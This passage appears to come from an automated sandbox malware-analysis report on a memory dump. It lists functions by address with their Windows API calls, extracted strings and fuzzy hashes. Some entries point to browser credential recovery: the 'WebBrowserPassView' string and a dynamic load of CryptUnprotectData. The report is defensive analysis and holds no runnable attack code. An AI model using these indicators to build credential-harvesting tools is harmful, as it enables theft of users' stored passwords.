Function 00404D3C, Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00404DE0
GetDlgItem.USER32 ref: 00404DF3
GetDlgItem.USER32 ref: 00404E08
GetDlgItem.USER32 ref: 00404E20
EndDialog.USER32(?,00000002), ref: 00404E3C
EndDialog.USER32(?,00000001), ref: 00404E51

Part of subcall function 00404AFB: GetDlgItem.USER32 ref: 00404B08
Part of subcall function 00404AFB: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404B1D

SendDlgItemMessageW.USER32 ref: 00404E69
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00404F7A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
Instruction ID: 9cc36a3a9081561078e880a2f522ad53539937229c5c78969c314d16862aa257
Opcode Fuzzy Hash: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
Instruction Fuzzy Hash: DE61D570100705ABDB31AF25C885A2A73B9FF90724F04C63EF615A66E1D778ED50CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00441DE1, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00441E61
_wcsicmp.MSVCRT ref: 00441E76
_wcsicmp.MSVCRT ref: 00441E8B

Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC

Strings

.save, xrefs: 00441E5B
log profile, xrefs: 00441DEF
http://, xrefs: 00441E18
https://, xrefs: 00441E23
signIn, xrefs: 00441E85

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp$wcslen$_memicmp
String ID: .save$http://$https://$log profile$signIn
API String ID: 1214746602-2708368587
Opcode ID: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
Instruction ID: 7a979a8a07820355720b76b8412d60638824142cd7e99aea4044fab4cdb489ca
Opcode Fuzzy Hash: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
Instruction Fuzzy Hash: A34146755487014AF7309A65898177773E8CB04329F308A2FF86BE26E2EB7CB4C6551E

Uniqueness

Uniqueness Score: -1.00%

Function 00404F8A, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00404F9A
??3@YAXPAX@Z.MSVCRT ref: 00404FB6
??2@YAPAXI@Z.MSVCRT ref: 00404FDC
memset.MSVCRT ref: 00404FEC
??2@YAPAXI@Z.MSVCRT ref: 0040501B
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405068
SetFocus.USER32(?,?,?,?), ref: 00405071
??3@YAXPAX@Z.MSVCRT ref: 00405081

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 0e9ce97f1899c70dad5c1b786cff8819ba8fc56cafb55192b5cf30274f9505bc
Instruction ID: ba4bb41810d6ea78f7103a52efe52e464eccc4a9d5620aafabcd38e7c3fa5a1e
Opcode Fuzzy Hash: 0e9ce97f1899c70dad5c1b786cff8819ba8fc56cafb55192b5cf30274f9505bc
Instruction Fuzzy Hash: 2331D3B1501601BFDB24AF69D94692AF7B8FF04304B10813EF145EB291D778EC90CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0C3, Relevance: 12.1, APIs: 8, Instructions: 76COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 0040D0E2
GetWindowRect.USER32 ref: 0040D0F8
GetWindowRect.USER32 ref: 0040D10B
BeginDeferWindowPos.USER32 ref: 0040D128
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040D145
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040D165
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040D18C
EndDeferWindowPos.USER32(?), ref: 0040D195

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Defer$Rect$BeginClient
String ID:
API String ID: 2126104762-0
Opcode ID: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
Instruction ID: 1b30ad45943261d114c7945feb8e2d934b1f0a15928f611d2c59e033839f0f44
Opcode Fuzzy Hash: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
Instruction Fuzzy Hash: 5F21D875900209FFDB11DFA8CD89FEEBBB9FB48701F104164F655A2160C771AA519B24

Uniqueness

Uniqueness Score: -1.00%

Function 004072FB, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407303
wcslen.MSVCRT ref: 00407310
GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040D79F,-00000210), ref: 00407320
GlobalLock.KERNEL32 ref: 0040732D
memcpy.MSVCRT ref: 00407336
GlobalUnlock.KERNEL32(00000000), ref: 0040733F
SetClipboardData.USER32 ref: 00407348
CloseClipboard.USER32 ref: 00407358

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
String ID:
API String ID: 1213725291-0
Opcode ID: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
Instruction ID: e9f640a6ba64593c4f3b5e3a0a2b414f675f529f5a9edaa6aa7e0ad5043136ba
Opcode Fuzzy Hash: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
Instruction Fuzzy Hash: 14F0B43B5002187BD2102FE5AC4DE1B772CEB86F97B050179FA09D2251DE749E0486B9

Uniqueness

Uniqueness Score: -1.00%

Function 00404BC7, Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00404BDE
SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404BF7
SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404C04
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404C10
memset.MSVCRT ref: 00404C74
SendMessageW.USER32(?,0000105F,?,?), ref: 00404CA9
SetFocus.USER32(?), ref: 00404D2F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
Instruction ID: e15596ac8dd535375262745d85448c61c7cc278dece76afc2af43b7580886122
Opcode Fuzzy Hash: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
Instruction Fuzzy Hash: 8B417C70901219BBDB20DF95CD85DAFBFB8FF08755F10406AF509A6291D3749E40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD8C, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192

wcscat.MSVCRT ref: 0040BE5B
_snwprintf.MSVCRT ref: 0040BE82

Strings

<tr>, xrefs: 0040BDB4
<td bgcolor=#%s>%s, xrefs: 0040BDAA
<td bgcolor=#%s nowrap>%s, xrefs: 0040BD9C
 , xrefs: 0040BE55

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite_snwprintfwcscatwcslen
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 2451617256-4153097237
Opcode ID: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
Instruction ID: be6843ca6d8e3427859c99e4dc5891dee3dff4c22b8a3cb8274265ecf8740657
Opcode Fuzzy Hash: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
Instruction Fuzzy Hash: BC31A031900208EFDF04AF55CC86EEE7B75FF44320F10416AE905AB1E2DB75AA51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A668, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040A67E
memset.MSVCRT ref: 0040A69D
GetMenuItemInfoW.USER32 ref: 0040A6D9
wcschr.MSVCRT ref: 0040A6F1

Strings

0, xrefs: 0040A6B8
6, xrefs: 0040A6C0

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
Instruction ID: 6379b183058c7bfcb2c9996af6a46f5bf8fbaffb9494aead0661b6c96fd4ce8b
Opcode Fuzzy Hash: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
Instruction Fuzzy Hash: FF219A72505340ABD721DF55C84599BB7F8FB84745F044A3FFA84A2280E7B6CA10CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407A1C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407A3C
_snwprintf.MSVCRT ref: 00407A63
wcscat.MSVCRT ref: 00407A75
wcscat.MSVCRT ref: 00407A92
wcscat.MSVCRT ref: 00407AA1

Strings

%2.2X, xrefs: 00407A52

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
Instruction ID: ec6d441468c88601e944e5005585d56a697b1d5e2a610cd326798869af21cd90
Opcode Fuzzy Hash: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
Instruction Fuzzy Hash: 0F012D72E4431575F720AB519C46BBF73A89F40B19F10407FFC14A50C2EABCEA444A99

Uniqueness

Uniqueness Score: -1.00%

Function 00441B86, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 00441B9B
wcscat.MSVCRT ref: 00441BAA
wcscat.MSVCRT ref: 00441BBB
wcscat.MSVCRT ref: 00441BCA
VerQueryValueW.VERSION(?,?,00000000,?), ref: 00441BE4

Part of subcall function 00407447: wcslen.MSVCRT ref: 0040744E
Part of subcall function 00407447: memcpy.MSVCRT ref: 00407464

Part of subcall function 00407511: lstrcpyW.KERNEL32 ref: 00407526
Part of subcall function 00407511: lstrlenW.KERNEL32(?), ref: 0040752D

Strings

\StringFileInfo\, xrefs: 00441B95

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
Instruction ID: a565dbaf5ef1236623e3a457584e7ee1bc303587053621a732091bcd91b9d386
Opcode Fuzzy Hash: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
Instruction Fuzzy Hash: 27017C7290020CB6EF51EAA1CD45EDF77BCAF04308F4005A7B514E2052EB78DB86AB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A497, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040A4BC
wcscpy.MSVCRT ref: 0040A4DF

Strings

dialog_%d, xrefs: 0040A4B0
strings, xrefs: 0040A4CA
menu_%d, xrefs: 0040A4A0
general, xrefs: 0040A4D5

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
Instruction ID: 8e174b2d8d79018ad6e296a97c01706163ed31911536b8ede193c50f01e1bc5f
Opcode Fuzzy Hash: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
Instruction Fuzzy Hash: CBE0B679A8830079F96025861E4BB2E61508774F59FB0886FF50AB05D1E9FE95A8710F

Uniqueness

Uniqueness Score: -1.00%

Function 00412BDF, Relevance: 10.5, APIs: 2, Strings: 5, Instructions: 21COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00412C04
memcpy.MSVCRT ref: 00412C14

Strings

,A, xrefs: 00412BDF, 00412C1F
Y,A, xrefs: 00412BF7, 00412BFE
a,A, xrefs: 00412BFF, 00412C25
a,A, xrefs: 00412BF0
!-A, xrefs: 00412C0F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: !-A$Y,A$a,A$a,A$,A
API String ID: 3510742995-194831239
Opcode ID: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
Instruction ID: c1edbe63f0487e6d5a9ef4690cfcbd933ff0b0d7cc0200e8d9d6566c39fc0ab4
Opcode Fuzzy Hash: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
Instruction Fuzzy Hash: C8E04F35980610EAF330DB459C07B863394A796756F50C43BF508A6193C6FC599C8B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00428591, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00428610

Strings

8, xrefs: 00428728
aggregate functions are not allowed in the GROUP BY clause, xrefs: 00428853
GROUP, xrefs: 004287CD
ORDER, xrefs: 0042879B
a GROUP BY clause is required before HAVING, xrefs: 0042883F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-1606337402
Opcode ID: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
Instruction ID: a56ed1d78848c17894bc611d03527086a745bd119e00672256ad5f5daa2e3940
Opcode Fuzzy Hash: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
Instruction Fuzzy Hash: 93818E706093619FDB10DF15E88161FB7E0BF98354F94885FE8849B252EB78EC44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00410EDB, Relevance: 9.1, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040F96C,00000000,00000000), ref: 00410F16
memset.MSVCRT ref: 00410F78
memset.MSVCRT ref: 00410F88

Part of subcall function 00410DF5: wcscpy.MSVCRT ref: 00410E1E

memset.MSVCRT ref: 00411073
wcscpy.MSVCRT ref: 00411094
CloseHandle.KERNEL32(?,0040F96C,?,?,?,0040F96C,00000000,00000000), ref: 004110EA

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
Instruction ID: ff77c4a4bb0d76b6113ba9f034b07e179d87586f5f3f4fadb46fa2bb0041fc85
Opcode Fuzzy Hash: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
Instruction Fuzzy Hash: CB5170B0508381AFD720DF55DC85A9BBBE8FBC8305F00492EF68882261DB74D985CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040D53E, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D560

Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D

Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2

Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97

Part of subcall function 00407B1D: GetSaveFileNameW.COMDLG32(?), ref: 00407B6C
Part of subcall function 00407B1D: wcscpy.MSVCRT ref: 00407B83

Strings

txt, xrefs: 0040D565
*.csv, xrefs: 0040D5B1
*.htm;*.html, xrefs: 0040D5C6
*.txt, xrefs: 0040D582
*.xml, xrefs: 0040D5ED

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 1392923015-3614832568
Opcode ID: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
Instruction ID: 456ec3227f593179f02471f626d387f8bd8a0122acdd439c58b7a13f613657e4
Opcode Fuzzy Hash: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
Instruction Fuzzy Hash: 6131FAB1D002599BDB50EFA9D8C1AEDBBB4FF09314F10417AF508B7282DF385A458B99

Uniqueness

Uniqueness Score: -1.00%

Function 00415DF9, Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415E2B
GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00415E39
free.MSVCRT(00000000), ref: 00415E7F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFilefreememset
String ID:
API String ID: 2507021081-0
Opcode ID: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
Instruction ID: de39e7dabe3dcffc9507685f2d24beb71d21f2267e90135c35d9c9407e9ebe28
Opcode Fuzzy Hash: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
Instruction Fuzzy Hash: B111A236D04B05EBDB106FB498C06FF7368AA85754B54013BF911E6280D7789F8195AA

Uniqueness

Uniqueness Score: -1.00%

Function 00414D24, Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00414D2B
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D49
malloc.MSVCRT ref: 00414D53
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D6A
free.MSVCRT(?), ref: 00414D73
free.MSVCRT(?,?), ref: 00414D91

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWidefree$ApisFilemalloc
String ID:
API String ID: 4131324427-0
Opcode ID: fcdf128664d182e83d2fd65dada33940b5d141c4db74cea0fb43d282e6a1fb2b
Instruction ID: 75ff5f127907765bac19b59c8f0cf631f86937604d45831965c424c16304f1b7
Opcode Fuzzy Hash: fcdf128664d182e83d2fd65dada33940b5d141c4db74cea0fb43d282e6a1fb2b
Instruction Fuzzy Hash: 3501D4725041257BAF225BB6AC41DFF369CDF857B4721022AFC04E3280EA288E4141EC

Uniqueness

Uniqueness Score: -1.00%

Function 004159C6, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?,?,00415592), ref: 00415A0A
GetTempPathA.KERNEL32(000000E6,?,?,00415592), ref: 00415A32
free.MSVCRT(00000000,0044A338,00000000), ref: 00415A5A

Strings

%s\etilqs_, xrefs: 00415AB1
etilqs_, xrefs: 00415A62

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PathTemp$free
String ID: %s\etilqs_$etilqs_
API String ID: 924794160-1420421710
Opcode ID: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
Instruction ID: 407cf19e3f66aff666bf3235626637e86bc259e86a40955958787b48e693a0c3
Opcode Fuzzy Hash: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
Instruction Fuzzy Hash: 80316831A44645DAE720EB61DCC1BFB739C9FA4348F1405BFE841D6182FE6C8EC54A19

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0F2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192

memset.MSVCRT ref: 0040C129

Part of subcall function 004124C0: memcpy.MSVCRT ref: 0041253D

Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03

_snwprintf.MSVCRT ref: 0040C173

Strings

<item>, xrefs: 0040C0FC
</item>, xrefs: 0040C18D
<%s>%s</%s>, xrefs: 0040C166

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 2236007434-2769808009
Opcode ID: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
Instruction ID: bd8afa7c54c2b984639c4d8fb182e53c6b214fce1ab7be0445daf1b4a409d2ac
Opcode Fuzzy Hash: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
Instruction Fuzzy Hash: 82119132904615BFEB11AF65DC82E99BB74FF04318F10402AF9046A5E2DB75B960CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D83C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D86C

Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585

wcsrchr.MSVCRT ref: 0040D886
wcscat.MSVCRT ref: 0040D8A2

Strings

General, xrefs: 0040D8AC
.cfg, xrefs: 0040D89C

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg$General
API String ID: 776488737-1188829934
Opcode ID: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
Instruction ID: b769b6074c2bbd437ee926744873151467191c08e4afcaaf49059e595a4f98b4
Opcode Fuzzy Hash: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
Instruction Fuzzy Hash: 34119877901318AADB10EF55DC45ECE7378AF48314F1041F6F518A7182DB78AA848F9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E030, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040E051
RegisterClassW.USER32 ref: 0040E076
GetModuleHandleW.KERNEL32(00000000), ref: 0040E07D
CreateWindowExW.USER32 ref: 0040E09C

Strings

WebBrowserPassView, xrefs: 0040E094, 0040E099, 0040E09A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID: WebBrowserPassView
API String ID: 2678498856-2171583229
Opcode ID: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
Instruction ID: d6937ed4ed068f8a41babfbfc400960a7e9d41ce1fcf29d78c1aeb4d070e2d0f
Opcode Fuzzy Hash: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
Instruction Fuzzy Hash: 5301C4B1901629ABDB019F998D89ADFBFBCFF09B50F10421AF514A2240D7B45A408BE9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2C7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C2EB
memset.MSVCRT ref: 0040C302

Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192

Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03

_snwprintf.MSVCRT ref: 0040C33E

Strings

<%s>, xrefs: 0040C32D
<?xml version="1.0" ?>, xrefs: 0040C307

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
String ID: <%s>$<?xml version="1.0" ?>
API String ID: 168708657-3296998653
Opcode ID: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
Instruction ID: 826567bfe222e6a97a7157a9ef984588091dd6de8d25c20f5ec279ce0d2f683a
Opcode Fuzzy Hash: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
Instruction Fuzzy Hash: 780167F2D401297AEB20A755CC46FEE767CEF44308F0000B6BB09B61D1DB78AA458A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403853, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
FreeLibrary.KERNEL32(00000000), ref: 00403897

Strings

CryptUnprotectData, xrefs: 0040386E
crypt32.dll, xrefs: 0040385D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 145871493-1827663648
Opcode ID: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
Instruction ID: e5a88ed766aaa6e52f35248584035ac6595561cae6bd6684aeb1aa38a92ec81b
Opcode Fuzzy Hash: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
Instruction Fuzzy Hash: 0A011A32500611ABC6219F158C4881BFEEAEBA1B42724887FF1C5E2660C3748A80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00411DB2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 00411DC1
wcscpy.MSVCRT ref: 00411DDC
